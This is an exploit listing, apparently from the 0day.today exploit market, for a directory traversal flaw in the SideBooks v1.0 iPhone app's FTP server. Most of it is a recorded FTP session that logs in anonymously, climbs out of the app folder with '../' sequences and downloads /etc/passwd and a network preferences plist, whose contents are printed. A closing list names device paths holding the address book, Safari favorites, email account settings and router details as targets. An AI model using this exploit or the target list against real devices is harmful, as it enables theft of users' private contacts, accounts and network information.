[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SideBooks v1.0 for iPhone / iPod touch, Directory Traversal

Author
R3d@l3rt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15459
Category
remote exploits
Date add
23-02-2011
Platform
hardware
# Exploit Title: SideBooks v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, Hackkey
# Software Link: http://itunes.apple.com/kr/app/sidebooks/id409777225?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware 
 
# There is directory traversal vulnerability in the SideBooks. 
# Exploit Testing
 
C:\>ftp
ftp> open 192.168.0.70 2100
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
-rwxr-xr-x     1 mobile mobile    1948482 Dec 14 04:48 SideBooksManual.pdf
226 Transfer complete.
ftp: 84 bytes received in 0.02Seconds 5.25Kbytes/sec.
ftp> cd ../../../../../../../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 19
-rwxr-xr-x     1 root admin         30 Oct 26 01:20 Applications
drwxrwxr-x     1 root admin         68 Aug 19 04:10 Developer
drwxrwxr-x     1 root admin        884 Jan 12 12:53 Library
drwxr-xr-x     1 root wheel        102 Aug 19 04:18 System
-rwxr-xr-x     1 root admin         11 Feb 21 08:13 User
drwxr-xr-x     1 root wheel       2074 Jan 13 09:52 bin
drwxr-xr-x     1 root admin         68 Oct 26 01:19 boot
-rw-r--r--     1 (null) (null)        638 Jan 25 15:30 control
drwxrwxr-x     1 root admin         68 Aug 03 12:41 cores
----------     1 (null) (null)          0 (null) dev
-rwxr-xr-x     1 root admin         11 Aug 26 05:20 etc
drwxr-xr-x     1 root admin         68 Oct 26 01:19 lib
drwxr-xr-x     1 root admin         68 Oct 26 01:19 mnt
drwxr-xr-x     1 root wheel        136 Oct 23 15:12 private
drwxr-xr-x     1 root wheel       1666 Jan 13 09:52 sbin
-rwxr-xr-x     1 root admin         15 Aug 26 05:20 tmp
drwxr-xr-x     1 root wheel        374 Jan 13 09:52 usr
-rwxr-xr-x     1 root admin         11 Aug 26 05:20 var
226 Transfer complete.
ftp: 1111 bytes received in 0.02Seconds 69.44Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get /../../../../../../private/var/mobile/Library/Preferences/com.apple.con
ference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '/../../../../../../private/var/mobi
le/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 270 bytes received in 0.00Seconds 270000.00Kbytes/sec.
ftp> quit
 
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
 
C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:XX:XX:bc:XX? XnatFlag
C:\>
 
 
 
# IPhone inside information
 
1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
      
2. Safari Favorites List
 - /private/var/mobile/Library/Safari
 
3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
 
4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist



#  0day.today [2024-12-24]  #